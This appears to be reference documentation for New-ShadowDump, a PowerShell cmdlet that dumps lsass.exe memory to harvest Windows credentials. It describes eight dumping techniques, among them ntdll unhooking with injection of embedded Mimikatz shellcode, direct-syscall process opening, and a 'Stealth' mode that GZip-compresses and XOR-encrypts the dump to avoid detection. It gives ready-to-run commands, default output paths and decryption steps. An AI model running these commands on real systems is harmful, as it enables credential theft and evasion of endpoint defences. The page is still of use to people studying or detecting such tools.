Description
Dumps lsass.exe memory to disk using a selectable technique with optional GZip compression and XOR encryption.
Overview
This script opens a handle to lsass.exe, captures its memory using the requested technique, and writes the result to disk. On success the cmdlet emits a FileInfo object for the written file so the path can be piped to downstream commands.
The Mimikatz and UnhookSyscalls techniques operate differently: they restore the clean ntdll.dll .text section from disk and inject embedded shellcode into a sacrificial process. For these techniques, -OutputPath and -Encrypt are not applicable and no FileInfo is emitted.
The Stealth technique always applies GZip compression followed by XOR encryption regardless of -Encrypt; use Invoke-ShadowDecrypt to recover the plaintext MDMP.
When any transform (compression or encryption) is applied, the cmdlet emits a second object immediately after the FileInfo that describes the transforms and, for encrypted output, includes the XOR key and a ready-to-run Invoke-ShadowDecrypt command.
Parameters
| Parameter | Type | Mandatory | Default | Description |
|---|---|---|---|---|
Technique |
DumpTechnique |
Yes | — | The dump method to use. See the Techniques table below. |
OutputPath |
string |
No | Technique-specific (see table) | Destination file path for the dump. Relative paths are resolved against the current PS location. Not applicable to Mimikatz or UnhookSyscalls. |
Encrypt |
bool |
No | $false |
XOR-encrypt the dump in memory before writing to disk. Supported by Callbacks and Fork only. |
Compress |
bool |
No | $false |
GZip-compress the dump before writing to disk. Supported by all techniques except Mimikatz, UnhookSyscalls, and Stealth (which always compresses). Can be combined with -Encrypt. |
Techniques
| Technique | Encrypt | Compress | Default Output Path | Description |
|---|---|---|---|---|
Mimikatz |
N/A | N/A | Shellcode-controlled | Restores the clean ntdll .text section then injects the embedded Mimikatz shellcode (PAN resource) into a sacrificial process. |
UnhookSyscalls |
N/A | N/A | Shellcode-controlled | Same ntdll-unhook pass as Mimikatz, but injects the embedded direct-syscall shellcode (OFF resource) instead. |
Simple |
Unsupported | Supported | C:\Users\Public\simpleMDWD.raw |
Straightforward MiniDumpWriteDump call with SeDebugPrivilege. |
Callbacks |
Supported | Supported | C:\Users\Public\callback.elf |
IoWriteAllCallback redirects all dbghelp file I/O into an in-memory buffer before writing to disk. |
Fork |
Supported | Supported | C:\Users\Public\panda.raw |
RtlCreateProcessReflection fork of lsass; MiniDumpWriteDump is called on the forked handle. |
Syscalls |
Unsupported | Supported | C:\Users\Public\sysMDWD.file |
Direct-syscall NtOpenProcess stub opens lsass without touching the Win32 API surface. |
Native |
Unsupported | Supported | C:\Users\Public\panda.sense |
Fully native MDMP writer: walks memory with VirtualQueryEx, reads pages with NtReadVirtualMemory, serialises MDMP by hand — no MiniDumpWriteDump dependency. |
Stealth |
Always (GZip+XOR) | Always (GZip+XOR) | C:\Users\Public\stealth_dump.gz |
Direct-syscall NtOpenProcess + MiniDumpWriteDump into a memory-preferred temp file. Output is always GZip-compressed then XOR-encrypted. |
Dependencies
dumpermodule
Operating Systems
- Windows x64
Pre-Requisites
- SeDebugPrivilege (Administrator or equivalent elevated token)
Example Usage
Dump lsass using the Native technique (uncompressed):
New-ShadowDump -Technique Native
Dump using Native with GZip compression:
New-ShadowDump -Technique Native -Compress -OutputPath C:\Temp\dump.gz
Dump using Callbacks with XOR encryption:
New-ShadowDump -Technique Callbacks -Encrypt -OutputPath C:\Temp\dump.elf
Dump using Callbacks with both GZip compression and XOR encryption:
New-ShadowDump -Technique Callbacks -Compress -Encrypt -OutputPath C:\Temp\dump.gz
Run the Stealth technique (always compresses and encrypts; no flags needed):
New-ShadowDump -Technique Stealth -OutputPath C:\Temp\out.gz
Example Output
Uncompressed, unencrypted techniques emit a FileInfo object:
FullName : C:\Users\Public\panda.sense
Length : 83886080
Compressed-only output also emits a transform info object:
FullName : C:\Users\Public\panda.sense
Length : 41943040
Compressed : True
Note : File is GZip-compressed. Decompress with GZip to recover the MDMP.
Encrypted output emits the XOR key details:
FullName : C:\Users\Public\callback.elf
Length : 83886080
XorMask : 0x9A1C5B9C
XorKey1 : 0x9A1C
XorKey2 : 0x5B9C
DecryptWith : Invoke-ShadowDecrypt -InputPath "C:\Users\Public\callback.elf" -OutputPath "callback.mdmp"
Compressed and encrypted output (including Stealth) emits both:
Compressed : True
XorMask : 0x9A1C5B9C
XorKey1 : 0x9A1C
XorKey2 : 0x5B9C
DecryptWith : Invoke-ShadowDecrypt -InputPath "C:\Users\Public\stealth_dump.gz" -OutputPath "stealth_dump.mdmp"
Note : File is GZip-compressed then XOR-encrypted. After XOR-decryption, decompress the result with GZip to recover the MDMP.
The Mimikatz and UnhookSyscalls techniques do not emit any output — output location is controlled by the injected shellcode.